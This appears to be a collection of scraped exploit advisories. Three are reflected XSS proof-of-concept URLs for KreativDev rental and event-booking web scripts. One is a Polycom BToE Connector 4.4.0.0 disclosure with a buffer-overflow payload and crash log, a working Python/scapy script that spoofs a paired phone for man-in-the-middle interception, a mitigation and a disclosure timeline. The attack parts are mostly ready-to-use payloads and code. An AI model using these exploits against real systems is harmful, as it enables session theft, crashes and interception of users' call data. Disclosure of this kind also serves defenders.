<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://codecanyon.net/user/kreativdev/portfolio │<br />│ Vendor : KreativDev │<br />│ Software : RentEquip - Multipurpose Rental 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /shop/products<br /><br />GET parameter 'min' is vulnerable to RXSS<br /><br />https://website/shop/products?category=cordless-tools&min=1026553%3balert(1)%2f%2f772&max=227<br /><br /><br />Path: /shop/products<br /><br />GET parameter 'max' is vulnerable to RXSS<br /><br />https://website/shop/products?category=cordless-tools&min=10&max=22724204%3balert(1)%2f%2f287<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Microsoft® Lync™ Better Together over Ethernet (BToE) feature on <br />Polycom® VVX® business media. phones enables you to control phone <br />activity from your computer using your Lync client.<br />The BToE feature enables you to place, answer, and hold audio and video <br />calls from your Polycom VVX phone and your Lync client on your computer.<br /><br />#### Title: Polycom BToE Connector 4.4.0.0 Multiple Vulnerabilities<br />#### Affected versions: 4.4.0.0<br />#### Tested on: Windows 10 Enterprise (x64), Windows 11 Home (x64), <br />PBC.exe (x86)<br />#### Credits: echo<br /><br />1. Remote stack based buffer overflow<br /><br />Polycom BToE Connector in version 4.4.0.0 is prone to Remote Stack Based <br />Buffer Overflow.<br />Vulnerability occurs in handling the following BToE protocol tags:<br /><QoSDSCPValue>, <MediaPort>, <Dtmf>, <SignInState> and is related to the <br />lack of error checking after call strstr function.<br />Value returned by strstr is next used to calculate size of data which <br />will be passed to strncpy.<br />Due to limitation imposed on us by recv function - direct control only <br />over 1024 bytes of data - using this vulnerability to achieve Remote <br />Code Execution is very hard (partial overwrite) or even impossible.<br /><br />0022DB5B | C68424 30020000 00 | mov byte ptr ss:[esp+230],0 |<br />0022DB63 | 68 28D83000 | push pbc.30D828 | <br />30D828:"</QoSDSCPValue>\n"<br />0022DB68 | 57 | push edi |<br />0022DB69 | 66:0FD68424 39020000 | movq qword ptr ss:[esp+239],xmm0 |<br />0022DB72 | 83C6 0E | add esi,E |<br />0022DB75 | C68424 41020000 00 | mov byte ptr ss:[esp+241],0 |<br />0022DB7D | FF15 F4222E00 | call dword ptr ds:[<&strstr>] |<br />0022DB83 | 8BF8 | mov edi,eax | <- poiter returned <br />by strstr (no error check!)<br />0022DB85 | 8D8424 38020000 | lea eax,dword ptr ss:[esp+238] |<br />0022DB8C | 2BFE | sub edi,esi | <- calculate the <br />size of QoSDSCPValue value<br />0022DB8E | 57 | push edi | (null - poiter)<br />0022DB8F | 56 | push esi |<br />0022DB90 | 50 | push eax |<br />0022DB91 | FF15 CC242E00 | call dword ptr ds:[<&strncpy>] | <br /><- (buffer overflow)<br />0022DB97 | 83C4 14 | add esp,14 |<br /><br />:POC:<br /><br />-- <MediaPort><br /><br /><?xml version="1.0" encoding="UTF-8" standalone="yes"?><br /><response protocolVersion="1" requestId="2"><br /><MediaPort><br />31337<br /></MediaPort>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br /><br />-- <QoSDSCPValue><br /><br /><?xml version="1.0" encoding="UTF-8" standalone="yes"?><br /><response><br /><QoSDSCPValue><br />0<br /></QoSDSCPValue>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br /><br />:CRASH LOG:<br /><br />0:004> g<br />(2d80.336c): Access violation - code c0000005 (first chance)<br />First chance exceptions are reported before any exception handling.<br />This exception may be expected and handled.<br />eax=00000000 ebx=ff09262c ecx=3fc2421e edx=00000000 esi=00f6dac4 <br />edi=00f6fffd<br />eip=774028e9 esp=00f6d974 ebp=00f6e284 iopl=0 nv up ei pl nz na <br />pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206<br />ucrtbase!strncpy+0x109:<br />774028e9 8907 mov dword ptr [edi],eax <br />ds:002b:00f6fffd=????????<br />0:003> g<br />(2d80.336c): Unknown exception - code c00001a5 (!!! second chance !!!)<br />eax=00000000 ebx=ff09262c ecx=3fc2421e edx=00000000 esi=00f6dac4 <br />edi=00f6fffd<br />eip=774028e9 esp=00f6d974 ebp=00f6e284 iopl=0 nv up ei pl nz na <br />pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206<br />ucrtbase!strncpy+0x109:<br />774028e9 8907 mov dword ptr [edi],eax <br />ds:002b:00f6fffd=????????<br />0:003> kb<br /> # ChildEBP RetAddr Args to Child<br />00 00f6d97c 002b9942 00f6e248 00f6d9d3 ff09262d ucrtbase!strncpy+0x109<br />WARNING: Stack unwind information not available. Following frames may be <br />wrong.<br />01 00f6e284 41414141 41414141 41414141 41414141 PBC+0x9942<br />02 00f6e288 41414141 41414141 41414141 41414141 0x41414141<br />03 00f6e28c 41414141 41414141 41414141 41414141 0x41414141<br />04 00f6e290 41414141 41414141 41414141 41414141 0x41414141<br />05 00f6e294 41414141 41414141 41414141 41414141 0x41414141<br />06 00f6e298 41414141 41414141 41414141 41414141 0x41414141<br />07 00f6e29c 41414141 41414141 41414141 41414141 0x41414141<br />08 00f6e2a0 41414141 41414141 41414141 41414141 0x41414141<br />09 00f6e2a4 41414141 41414141 41414141 41414141 0x41414141<br />0a 00f6e2a8 41414141 41414141 41414141 41414141 0x41414141<br />0b 00f6e2ac 41414141 41414141 41414141 41414141 0x41414141<br />0c 00f6e2b0 41414141 41414141 41414141 41414141 0x41414141<br />0d 00f6e2b4 41414141 41414141 41414141 41414141 0x41414141<br />0e 00f6e2b8 41414141 41414141 41414141 41414141 0x41414141<br />0f 00f6e2bc 41414141 41414141 41414141 41414141 0x41414141<br />10 00f6e2c0 41414141 41414141 41414141 41414141 0x41414141<br />11 00f6e2c4 41414141 41414141 41414141 41414141 0x41414141<br />12 00f6e2c8 41414141 41414141 41414141 41414141 0x41414141<br />13 00f6e2cc 41414141 41414141 41414141 41414141 0x41414141<br />14 00f6e2d0 41414141 41414141 41414141 41414141 0x41414141<br />15 00f6e2d4 41414141 41414141 41414141 41414141 0x41414141<br />16 00f6e2d8 41414141 41414141 41414141 41414141 0x41414141<br />17 00f6e2dc 41414141 41414141 41414141 41414141 0x41414141<br />18 00f6e2e0 41414141 41414141 41414141 41414141 0x41414141<br />19 00f6e2e4 41414141 41414141 41414141 41414141 0x41414141<br />1a 00f6e2e8 41414141 41414141 41414141 41414141 0x41414141<br />1b 00f6e2ec 41414141 41414141 41414141 41414141 0x41414141<br />1c 00f6e2f0 41414141 41414141 41414141 41414141 0x41414141<br />1d 00f6e2f4 41414141 41414141 41414141 41414141 0x41414141<br />1e 00f6e2f8 41414141 41414141 41414141 41414141 0x41414141<br />1f 00f6e2fc 41414141 41414141 41414141 41414141 0x41414141<br />20 00f6e300 41414141 41414141 41414141 41414141 0x41414141<br />21 00f6e304 41414141 41414141 41414141 41414141 0x41414141<br />22 00f6e308 41414141 41414141 41414141 41414141 0x41414141<br />23 00f6e30c 41414141 41414141 41414141 41414141 0x41414141<br />24 00f6e310 41414141 41414141 41414141 41414141 0x41414141<br />25 00f6e314 41414141 41414141 41414141 41414141 0x41414141<br />26 00f6e318 41414141 41414141 41414141 41414141 0x41414141<br />27 00f6e31c 41414141 41414141 41414141 41414141 0x41414141<br />28 00f6e320 41414141 41414141 41414141 41414141 0x41414141<br />29 00f6e324 41414141 41414141 41414141 0000000a 0x41414141<br />2a 00f6e328 41414141 41414141 0000000a 00000000 0x41414141<br />2b 00f6e32c 41414141 0000000a 00000000 00000000 0x41414141<br />2c 00f6e330 00000000 00000000 00000000 00000000 0x41414141<br /><br />2. Man in the middle / Device spoofing<br /><br />BToE protocol occurs in two versions, newer and legacy.<br />Implementation of newer version of BToE in BToE Connector is based on <br />openssl library and that version support server authenticity<br />verification. Legacy BToE implementation is relying on plink tool from <br />PuTTY and doesn't check server authenticity while establishing the <br />connection to the server.<br />An attacker which has access to the 2081 UDP port which the PBC.exe is <br />listening on, can - based on the lack of server authenticity<br />verification - send a specially crafted packet and pair system/lync of <br />attacked user with the operating system of attacker choice.<br /> From this point, an attacker can intercept or/and modify all data - <br />including phone records and SRTP streams - that are transferred between <br />the attacked system/lync app and the user's phone (polycom device).<br /><br />:POC:<br /><br />[victim system]<br /><br />C:\Windows\System32>hostname<br />victim<br /><br />C:\Windows\System32>ipconfig<br /><br />Windows IP Configuration<br /><br />Wireless LAN adapter Wi-Fi:<br /><br /> Connection-specific DNS Suffix . : NAT.in.evil.empire<br /> Link-local IPv6 Address . . . . . : <br />2001:db8:3333:4444:5555:6666:7777:8888<br /> IPv4 Address. . . . . . . . . . . : 192.168.0.11<br /> Subnet Mask . . . . . . . . . . . : 255.255.255.0<br /> Default Gateway . . . . . . . . . : 192.168.0.1<br /><br />C:\Windows\System32><br /><br />C:\Windows\System32>netstat -p UDP -a -n -b<br /><br />Active Connections<br /><br /> Proto Local Address Foreign Address State<br /> UDP 0.0.0.0:500 *:*<br /> IKEEXT<br /> [svchost.exe]<br /> UDP 0.0.0.0:2081 *:*<br /> [PBC.exe]<br /> ...<br /><br />C:\Windows\System32><br /><br />[attacker system]<br /><br />echo@attacker:~$ hostname<br />attacker<br />echo@attacker:~$<br /><br />echo@attacker:~$ ip a<br />...<br />3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP <br />group default qlen 1000<br /> link/ether 80:91:33:9c:b9:9f brd ff:ff:ff:ff:ff:ff<br /> inet 192.168.0.16/24 brd 192.168.0.255 scope global dynamic <br />noprefixroute wlan0<br /> valid_lft 3404sec preferred_lft 3404sec<br /> inet6 1111::2222:3333:4444:5555/66 scope link noprefixroute<br /> valid_lft forever preferred_lft forever<br />echo@attacker:~$<br /><br />root@attacker:/home# tail -n 1 /etc/passwd<br />Synergy:x:1001:1001::/home/Synergy:/bin/bash #pwd = Ch@mp$0FI1C<br />root@attacker:/home#<br /><br />root@attacker:/home# tail /etc/ssh/sshd_config<br /><br /># Example of overriding settings on a per-user basis<br />#Match User anoncvs<br /># X11Forwarding no<br /># AllowTcpForwarding no<br /># PermitTTY no<br /># ForceCommand cvs server<br /><br />AllowUsers Synergy<br /><br />root@attacker:/home#<br /><br />echo@attacker:~$ cat /home/echo/Pulpit/BTOE/BToEMiTMPoc.py<br />#!/usr/bin/python3<br /><br />import argparse, socket<br />from scapy import all as scapy<br /><br />def packet(pbc_ip, pbc_port, phone_ip, phone_port):<br /> fp_ip = phone_ip.split(".");<br /> payload = struct.pack("BBBBHBBBBBBBBBBBBBBBBBBBBB",<br /> int(fp_ip[0]), int(fp_ip[1]), int(fp_ip[2]), <br />int(fp_ip[3]),<br /> socket.htons(int(phone_port)),<br /> 0x00, 0x04, 0xF3,<br />5,8,9,10,11,12,1,13,14,15,16,17,18,19,0x1A, 0x1B, 0x1C, 0x1D);<br /> packet = scapy.IP(dst=pbc_ip)/scapy.UDP(dport=pbc_port, <br />sport=scapy.RandShort())/scapy.raw(payload);<br /> scapy.send(packet, verbose=False);<br /><br />def poc():<br /> opt = argparse.ArgumentParser(description='Process some integers.');<br /> opt.add_argument('--pbc_ip', action='store',<br /> type=str,<br /> help='PBC.exe IPv4 address', required=True);<br /> opt.add_argument('--pbc_port', action='store', type=int, <br />help='PBC.exe UDP port', required=True);<br /> opt.add_argument('--fake_phone_ip', action='store', type=str, <br />help='Fake phone IPv4 address', required=True);<br /> opt.add_argument('--fake_phone_port', action='store', type=str, <br />help='Fake phone TCP port', required=True);<br /> args = opt.parse_args()<br /> packet(args.pbc_ip, args.pbc_port, args.fake_phone_ip, <br />args.fake_phone_port);<br /><br />if __name__ == "__main__":<br /> poc();<br />echo@attacker:~$<br /><br />echo@attacker:~$ sudo python3 /home/echo/Pulpit/BTOE/BToEMiTMPoc.py <br />--pbc_ip 192.168.0.11 --pbc_port 2081 --fake_phone_ip 192.168.0.16 <br />--fake_phone_port 31337<br /><br />echo@attacker:~$ nc -l -v -p 31337<br />listening on [any] 31337 ...<br /><br />connect to [192.168.0.16] from attacker [192.168.0.16] 59680<br /><?xml version="1.0" encoding="UTF-8" standalone="yes"?><br /><request protocolVersion="1" requestId="2"><br /><GruuRequest></GruuRequest><br /></request><br /><br />####<br />:Recommendation:<br /><br />Since there are still no official fixes, I suggest you to consider <br />blocking plink.exe from location "C:\Program Files <br />[(x86)]\Polycom\Polycom BToE Connector"<br />in order to disable legacy BToE support in BToE Connector.<br /><br />####<br />:Disclosure Timeline:<br /><br />20.02.2023 – Initial contact with security@poly.com.<br />22.02.2023 – Sending details to HP.<br />06.03.2023 - HP/Poly plans the work schedule and fixes for product.<br />13.03.2023 – HP/Poly was informed about 90 days disclosure policy.<br />10.05.2023 – Request for status.<br />11.05.2023 – Release is planning on mid-June.<br />13.06.2023 - Request for status.<br />15.06.2023 - Publication.<br /><br />-----BEGIN PGP PUBLIC KEY BLOCK-----<br /><br />xjMEYgzK+BYJKwYBBAHaRw8BAQdAuvqLumsJp8MYs+ccGRDNptLpiXET6kQ4EMSQ<br />m0+K1kbNGEJVRyA8c2VjYnVnczNAZ21haWwuY29tPsKLBBMWCAAzFiEEVFMxXX78<br />QbIacMz7MuWgzP7on3UFAmIMyvgCGwMFCwkIBwIGFQgJCgsCBRYCAwEAAAoJEDLl<br />oMz+6J91RUwBAKYGAZ6fDeCVFckLBYJtAOfapZOkqtxsyPkWH2nI4nOOAP40wwVT<br />HhF+/KzlydxgZeWSFisfQiG4/gKee8TOfp7LDc44BGIMyvkSCisGAQQBl1UBBQEB<br />B0Bao5PIrX/c+RguQIRDZ0FRnigzTdRS1970qRbrlxUIBAMBCAfCeAQYFggAIBYh<br />BFRTMV1+/EGyGnDM+zLloMz+6J91BQJiDMr5AhsMAAoJEDLloMz+6J91OIkA/iS1<br />KwXlgE28cwK3PyPvNe7Jv5E+HXb3lXVxMe63iKdsAP94dozMMgIPdTHXU8LXxkR/<br />YPBCvA4bkQ9SA37Ak2UDDg==<br />=6VCh<br />-----END PGP PUBLIC KEY BLOCK-----<br /><br /><br /><br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://codecanyon.net/user/kreativdev/portfolio │<br />│ Vendor : KreativDev │<br />│ Software : Multirent - Multivendor Equipment Rental 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /shop/products<br /><br />GET parameter 'min' is vulnerable to RXSS<br /><br />https://website/shop/products?category=cordless-tools&rating=5&min=5650846%3balert(1)%2f%2f282&max=300<br /><br /><br />Path: /shop/products<br /><br />GET parameter 'max' is vulnerable to RXSS<br /><br />https://website/shop/products?category=cordless-tools&rating=5&min=56&max=30053987%3balert(1)%2f%2f236<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://codecanyon.net/user/kreativdev/portfolio │<br />│ Vendor : KreativDev │<br />│ Software : Evento - Multivendor Event Ticket Booking 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /events<br /><br />GET parameter 'min' is vulnerable to RXSS<br /><br />https://website/evento/events?search-input=&category=wedding&event=venue&min=2659526%3balert(1)%2f%2f781&max=95<br /><br /><br />Path: /events<br /><br />GET parameter 'max' is vulnerable to RXSS<br /><br />https://website/evento/events?category=wedding&event=venue&min=26&max=9560734%3balert(1)%2f%2f989<br /><br /><br />[-] Done<br /></code></pre>